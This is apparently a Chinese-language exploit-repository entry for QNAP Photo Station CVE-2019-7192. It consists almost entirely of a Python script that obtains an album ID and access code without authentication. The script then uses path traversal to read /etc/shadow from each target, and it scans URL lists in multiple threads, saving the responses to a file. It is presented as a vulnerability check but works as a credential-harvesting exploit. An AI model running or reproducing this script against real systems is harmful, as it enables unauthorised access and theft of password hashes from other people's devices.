QNAP Photo Station远程代码执行漏洞CVE-2019-7192

QNAP Systems Photo Station是中国威联通（QNAP Systems）公司的一款照片管理和查看应用程序。
QNAP Systems Photo Station中存在访问控制错误漏洞。远程攻击者可利用该漏洞对系统进行未经授权的访问。

Author: VulnExpo

QNAP_CVE-2019-7192_Exploit.py

@@ -0,0 +1,108 @@
+# 作者: VulnExpo
+# 日期: 2023-12-22
+
+import requests
+import argparse
+import threading
+import re
+requests.packages.urllib3.disable_warnings(requests.packages.urllib3.exceptions.InsecureRequestWarning)
+
+def check_for_vulnerability(url, proxies=None, success_file=None):
+	try:
+		headers = {
+		"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:59.0) Gecko/20100101 Firefox/59.0",
+		"Accept": "text/html,application/xhtml+xml,appication/xml;q=0.9,*/*;q=0.8",
+		"Accept-Language":"zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2",
+		"Accept-Encoding":"gzip, deflate",
+		"Connection":"close",
+		"Upgrade-Insecure-Requests":"1",
+		"Pragma":"no-cache",
+		"Cache-Control":"no-cache",
+		"Content-Type":"application/x-www-form-urlencoded"
+		}
+
+		req = requests.Session()
+
+		# search album_id
+
+		print("="*65)
+		post_data = {'a': 'setSlideshow', 'f': 'qsamplealbum'}
+		album_id_response = req.post(url + "/photo/p/api/album.php", data=post_data, headers=headers, verify=False, timeout=10)
+
+		if album_id_response.status_code != 200:
+			print("album id not found \n\033[91mnot vulnerable\033[0m")
+			return False
+
+		album_id = re.search('(?<=<output>).*?(?=</output>)', album_id_response.text).group()
+
+		# search $_SESSION['access_code']
+
+		access_code_response = req.get(url + "/photo/slideshow.php?album=" + album_id, headers=headers, verify=False, timeout=10)
+		if access_code_response.status_code != 200:
+			print("slideshow not found \n\033[91mnot vulnerable\033[0m")
+			return False
+
+		access_code = re.search("(?<=encodeURIComponent\\(').*?(?=')", access_code_response.text).group()
+
+		def get_file_content(file):
+			post_data = {'album': album_id, 'a': 'caption', 'ac': access_code, 'f': 'UMGObv', 'filename': file}
+			file_read_response = req.post(url + "/photo/p/api/video.php", data=post_data, headers=headers, verify=False, timeout=10)
+			print(f"目标URL: {url}, 响应内容: {file_read_response.text}")
+			with open(success_file, 'a') as s_file:
+				s_file.write("=" * 65 + "\n")
+				s_file.write(f"目标URL: {url}\n")
+				s_file.write(f"响应内容: {file_read_response.text}\n\n")
+
+		# get_file_content('./../../../../../etc/hostname')
+		get_file_content('./../../../../../etc/shadow')
+
+	except Exception as e:
+		print(f"发生异常：{e}")
+		return False
+
+def scan_targets(targets, proxies=None, success_file=None):
+	for target in targets:
+		target = target.strip()
+		check_for_vulnerability(target, proxies, success_file)
+
+def multi_threaded_scan(urls, proxies=None, success_file=None, num_threads=4):
+	threads = []
+
+	for i in range(num_threads):
+		thread = threading.Thread(target=scan_targets, args=(urls[i::num_threads], proxies, success_file))
+		threads.append(thread)
+
+	for thread in threads:
+		thread.start()
+
+	for thread in threads:
+		thread.join()
+
+if __name__ == '__main__':
+	parser = argparse.ArgumentParser(description="QNAP Photo Station远程代码执行漏洞CVE-2019-7192")
+	parser.add_argument("-u", "--url", help="目标URL")
+	parser.add_argument("-f", "--file", default="url.txt", help="目标URL列表，默认为url.txt")
+	parser.add_argument("-t", "--threads", type=int, default=4, help="线程数，默认为4")
+	parser.add_argument("-p", "--proxy", help="代理服务器地址（例如：http://localhost:8080）")
+	args = parser.parse_args()
+
+	if not args.url and not args.file:
+		print("请使用 -u 指定要扫描的目标URL或使用默认文件 url.txt。")
+		exit(1)
+
+	if args.url:
+		urls = [args.url]
+	elif args.file:
+		with open(args.file, 'r') as file:
+			urls = file.readlines()
+
+	success_file = 'success_targets.txt'
+
+	proxies = {
+		"http": args.proxy,
+		"https": args.proxy
+	} if args.proxy else None
+
+	multi_threaded_scan(urls, proxies, success_file, args.threads)
+
+	print("扫描完成，成功的目标已保存到 success_targets.txt 文件中。")